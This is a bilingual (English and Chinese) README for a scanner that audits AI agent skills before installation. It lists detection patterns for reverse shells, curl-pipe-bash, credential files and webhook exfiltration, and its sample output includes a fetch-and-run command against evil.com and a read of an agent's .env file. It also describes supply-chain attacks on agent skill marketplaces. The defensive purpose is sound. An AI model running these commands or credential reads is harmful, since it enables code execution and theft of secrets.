Skill Security Audit
MANDATORY security check before installing external skills.
Inspired by the ClawHavoc campaign that compromised 341 malicious skills on ClawHub.
When to Use
Run this audit BEFORE any skill installation:
- - �INLINECODE0
- Manual skill download/copy
- Skills from GitHub, URLs, or untrusted sources
Quick Start
CODEBLOCK0
What It Detects
🔴 CRITICAL (Blocks Installation)
| Category | Patterns |
|---|
| Reverse Shells | INLINECODE1�, bash /dev/tcp, Python socket shells |
| Curl-Pipe-Bash |
curl \| bash,
wget && chmod +x |
|
Credential Access | ~/.ssh, ~/.aws, ~/.openclaw, .env files |
|
Data Exfiltration | Discord/Slack webhooks, POST with secrets |
|
Malicious Domains | glot.io, pastebin (known malware hosts) |
|
Persistence | crontab, systemd, LaunchAgents, .bashrc |
|
Command Injection | eval(), exec(), subprocess shell=True |
|
Obfuscation | base64 decode pipes, pickle, marshal |
🟡 WARNING (Review Required)
Only patterns that are suspicious regardless of skill type:
- - Raw socket usage (unusual for most skills)
- Dynamic code compilation
- File/directory deletion
- Screenshot/keyboard capture libraries
- Low-level system calls (ctypes)
Philosophy
We intentionally don't warn on common patterns like:
- - HTTP requests (normal for API skills)
- API key references (normal for integration skills)
- File writes (normal for data skills)
- Environment variable access (normal for config)
This reduces noise so real threats stand out.
Risk Scoring
CODEBLOCK1�
| Score | Level | Action |
|---|
| 0-20 | 🟢 SAFE | Auto-approve |
| 21-50 |
🟡 CAUTION | Review findings |
| 51-80 | 🔶 DANGER | Detailed review required |
| 81-100 | 🔴 BLOCKED | Do NOT install |
Sample Output
CODEBLOCK2
Integration with clawhub
Create a wrapper script to auto-scan before installation:
CODEBLOCK3
References
See references/threat-patterns.md for detailed pattern explanations.
Credits
Developed in response to the ClawHavoc campaign (Feb 2026) that demonstrated
large-scale supply chain attacks via AI agent skill marketplaces.
技能安全审计
强制要求:安装外部技能前必须进行安全检查。
受ClawHavoc攻击事件启发,该事件导致ClawHub上341个恶意技能被攻陷。
使用时机
请在任何技能安装前运行此审计:
- - clawhub install <技能名称>
- 手动下载/复制技能
- 来自GitHub、URL或不可信来源的技能
快速开始
bash
扫描技能文件夹
python3 scripts/scan_skill.py /path/to/skill
JSON格式输出(适用于自动化)
python3 scripts/scan_skill.py /path/to/skill --json
仅在安全时返回退出码0
python3 scripts/scan_skill.py /path/to/skill --install-if-safe
检测内容
🔴 严重(阻止安装)
| 类别 | 模式 |
|---|
| 反向Shell | nc -e, bash /dev/tcp, Python socket shells |
| Curl管道Bash |
curl \| bash, wget && chmod +x |
|
凭据访问 | ~/.ssh, ~/.aws, ~/.openclaw, .env文件 |
|
数据外泄 | Discord/Slack webhooks, 携带密钥的POST请求 |
|
恶意域名 | glot.io, pastebin(已知恶意软件托管) |
|
持久化 | crontab, systemd, LaunchAgents, .bashrc |
|
命令注入 | eval(), exec(), subprocess shell=True |
|
混淆 | base64解码管道, pickle, marshal |
🟡 警告(需审查)
仅检测无论技能类型如何都可疑的模式:
- - 原始套接字使用(对大多数技能不常见)
- 动态代码编译
- 文件/目录删除
- 截图/键盘捕获库
- 低级系统调用(ctypes)
设计理念
我们有意不警告常见模式,例如:
- - HTTP请求(API技能的正常行为)
- API密钥引用(集成技能的正常行为)
- 文件写入(数据技能的正常行为)
- 环境变量访问(配置的正常行为)
这减少了噪音,使真正的威胁凸显出来。
风险评分
严重发现 × 30 = 基础分数
警告发现 × 3(上限10)= 警告贡献
🟡 谨慎 | 审查发现 |
| 51-80 | 🔶 危险 | 需详细审查 |
| 81-100 | 🔴 阻止 | 请勿安装 |
示例输出
════════════════════════════════════════════════════════════
技能安全审计:可疑技能
════════════════════════════════════════════════════════════
📊 风险评分:90/100 - 🔴 阻止
🔴 严重发现(3项)
[install.py:15] Curl管道到Shell(危险!)
代码:os.system(curl https://evil.com/x.sh | bash)
[setup.py:42] Discord webhook外泄
代码:requests.post(https://discord.com/api/webhooks/...)
[run.py:8] ClawdBot .env访问(ClawHavoc目标!)
代码:open(os.path.expanduser(~/.clawdbot/.env))
📁 扫描文件数:5
📏 总行数:230
════════════════════════════════════════════════════════════
🔴 阻止 - 请勿安装此技能
════════════════════════════════════════════════════════════
与clawhub集成
创建包装脚本以在安装前自动扫描:
bash
#!/bin/bash
clawhub-secure:安装前扫描
SKILL=$2
TEMP=/tmp/skill-audit-$$
获取但不安装
clawhub inspect $SKILL --out $TEMP
扫描
python3 /path/to/scan_skill.py $TEMP --install-if-safe
if [ $? -eq 0 ]; then
clawhub install $SKILL
else
echo 🔴 安全扫描阻止安装
exit 1
fi
rm -rf $TEMP
参考资料
详见 references/threat-patterns.md 中的模式详细说明。
致谢
本工具针对ClawHavoc攻击事件(2026年2月)开发,该事件展示了通过AI代理技能市场进行的大规模供应链攻击。
